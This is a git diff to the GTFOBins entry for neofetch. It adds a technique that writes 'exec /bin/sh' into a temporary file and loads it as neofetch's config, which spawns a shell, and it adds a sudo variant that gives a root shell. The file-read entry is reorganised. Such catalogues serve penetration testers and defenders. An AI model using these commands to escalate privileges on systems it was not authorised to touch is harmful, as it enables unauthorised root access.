diff --git a/_gtfobins/neofetch.md b/_gtfobins/neofetch.md index 26a468c..d759390 100644 --- a/_gtfobins/neofetch.md +++ b/_gtfobins/neofetch.md @@ -1,12 +1,18 @@ --- -description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files. functions: - file-read: + shell: - code: | + TF=$(mktemp) + echo 'exec /bin/sh' >$TF + neofetch --config $TF + file-read: + - description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files. + code: | LFILE=file_to_read neofetch --ascii $LFILE sudo: - code: | - LFILE=file_to_read - sudo neofetch --ascii $LFILE + TF=$(mktemp) + echo 'exec /bin/sh' >$TF + sudo neofetch --config $TF ---